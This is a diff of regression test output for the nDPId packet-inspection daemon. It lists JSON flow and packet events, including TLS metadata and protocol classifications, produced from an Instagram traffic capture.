+00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":746,"source":"instagram.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1568796253782,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1568796253782,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAFQGLsIfDVY0wKgCEQG7wMv1rwrBmYoGpKASbHB3qgAAAgQFeAQCCAo6Lg6wDXByoQEDAwg="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":747,"source":"instagram.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1568796253784,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1568796253784,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGAsrAqAIRHw1WNMDLAbuZigak9a8KwoAQCAwKkgAAAQEICg1wcq86Lg6w"} +00918{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":748,"source":"instagram.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1568796253770,"flow_last_seen":1568796253784,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1568796253784,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49355,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"7a29c223fb122ec64d10f0a159e07996","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} 
+00967{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":750,"source":"instagram.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1568796253770,"flow_last_seen":1568796253798,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1610,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1568796253798,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49355,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3 (Fizz)","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"7a29c223fb122ec64d10f0a159e07996","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2070,"source":"instagram.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1568796254514,"flow_last_seen":1568796254514,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1568796254514,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49357,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2070,"source":"instagram.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1568796254514,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1568796254514,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGAr7AqAIRHw1WNMDNAbsBxqpOAAAAALAC\/\/8NqAAAAgQFtAEDAwYBAQgKDXB1TAAAAAAEAgAA"} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2071,"source":"instagram.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1568796254515,"flow_last_seen":1568796254515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1568796254515,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49358,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2071,"source":"instagram.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1568796254515,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1568796254515,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGAr7AqAIRHw1WNMDOAbvBtYQbAAAAALAC\/\/9z6gAAAgQFtAEDAwYBAQgKDXB1TAAAAAAEAgAA"} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2073,"source":"instagram.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1568796254524,"flow_last_seen":1568796254524,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1568796254524,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49359,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2073,"source":"instagram.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1568796254524,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1568796254524,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGAr7AqAIRHw1WNMDPAbv9TOkSAAAAALAC\/\/\/TUgAAAgQFtAEDAwYBAQgKDXB1VAAAAAAEAgAA"} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2074,"source":"instagram.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1568796254526,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1568796254526,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAFQGLsIfDVY0wKgCEQG7wM2mvmccAcaqT6ASbHDxzgAAAgQFeAQCCAoU9Z3GDXB1TAEDAwg="} 
+00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2075,"source":"instagram.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1568796254526,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1568796254526,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAFQGLsIfDVY0wKgCEQG7wM6bGFkcwbWEHKASbHAfPgAAAgQFeAQCCArYQyzxDXB1TAEDAwg="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2076,"source":"instagram.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1568796254527,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1568796254527,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGAsrAqAIRHw1WNMDNAbsBxqpPpr5nHYAQCAyEugAAAQEICg1wdVYU9Z3G"} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2077,"source":"instagram.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1568796254527,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1568796254527,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGAsrAqAIRHw1WNMDOAbvBtYQcmxhZHYAQCAyyKQAAAQEICg1wdVbYQyzx"} 
+00920{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2078,"source":"instagram.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1568796254514,"flow_last_seen":1568796254528,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":419,"flow_tot_l4_payload_len":419,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1568796254528,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49357,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} +00920{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2080,"source":"instagram.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1568796254515,"flow_last_seen":1568796254531,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":419,"flow_tot_l4_payload_len":419,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1568796254531,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49358,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} 
+00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2082,"source":"instagram.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1568796254536,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1568796254536,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAFQGLsIfDVY0wKgCEQG7wM\/pQUID\/UzpE6ASbHCRrQAAAgQFeAQCCAoUEKcNDXB1VAEDAwg="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2083,"source":"instagram.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1568796254538,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1568796254538,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGAsrAqAIRHw1WNMDPAbv9TOkT6UFCBIAQCAwkmAAAAQEICg1wdV8UEKcN"} +00920{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2084,"source":"instagram.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1568796254524,"flow_last_seen":1568796254539,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":419,"flow_tot_l4_payload_len":419,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1568796254539,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49359,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} 
+00967{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2088,"source":"instagram.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1568796254514,"flow_last_seen":1568796254539,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":597,"flow_tot_l4_payload_len":1238,"flow_avg_l4_payload_len":154,"midstream":0,"thread_ts_msec":1568796254539,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49357,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3 (Fizz)","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"fcb2d4d0991292272fcb1e464eedfd43","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} +00967{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2092,"source":"instagram.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1568796254515,"flow_last_seen":1568796254543,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":529,"flow_tot_l4_payload_len":1170,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1568796254543,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49358,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3 (Fizz)","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"fcb2d4d0991292272fcb1e464eedfd43","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} 
+00967{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2098,"source":"instagram.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1568796254524,"flow_last_seen":1568796254551,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":513,"flow_tot_l4_payload_len":1154,"flow_avg_l4_payload_len":144,"midstream":0,"thread_ts_msec":1568796254551,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49359,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3 (Fizz)","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"fcb2d4d0991292272fcb1e464eedfd43","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} +00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720901262,"flow_last_seen":1436720901262,"flow_idle_time":7560000,"flow_min_l4_payload_len":258,"flow_max_l4_payload_len":258,"flow_tot_l4_payload_len":258,"flow_avg_l4_payload_len":258,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.153","src_port":37350,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00834{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1436720908576,"flow_last_seen":1436720908733,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4627,"flow_avg_l4_payload_len":330,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41181,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}} +00834{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1436720908577,"flow_last_seen":1436720908737,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4627,"flow_avg_l4_payload_len":330,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41182,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}} 
+00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":58,"flow_first_seen":1436720900687,"flow_last_seen":1436720901200,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":46392,"flow_avg_l4_payload_len":799,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":57936,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"}} 00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1436720908533,"flow_last_seen":1436720908579,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":26540,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"}} -00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1436720900692,"flow_last_seen":1436720900876,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3517,"flow_avg_l4_payload_len":502,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.185","src_port":57965,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00655{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1436720908531,"flow_last_seen":1436720908567,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.185","src_port":57966,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00580{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1436720908531,"flow_last_seen":1436720908567,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.185","src_port":57966,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1436720952561,"flow_last_seen":1436720952561,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":18,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.159","src_port":58690,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
-00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1436720952561,"flow_last_seen":1436720952561,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":18,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.159","src_port":58690,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00691{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1436720901182,"flow_last_seen":1436720908544,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":26795,"flow_avg_l4_payload_len":788,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"77.67.29.17","src_port":33976,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1436720900692,"flow_last_seen":1436720900876,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3517,"flow_avg_l4_payload_len":502,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.185","src_port":57965,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00655{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1436720908531,"flow_last_seen":1436720908567,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.185","src_port":57966,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00580{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1436720908531,"flow_last_seen":1436720908567,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.185","src_port":57966,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1436720952561,"flow_last_seen":1436720952561,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":18,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.159","src_port":58690,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1436720952561,"flow_last_seen":1436720952561,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":18,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.159","src_port":58690,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00691{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1436720901182,"flow_last_seen":1436720908544,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":26795,"flow_avg_l4_payload_len":788,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"77.67.29.17","src_port":33976,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1436720908523,"flow_last_seen":1436720908570,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":155,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":51219,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"}} 
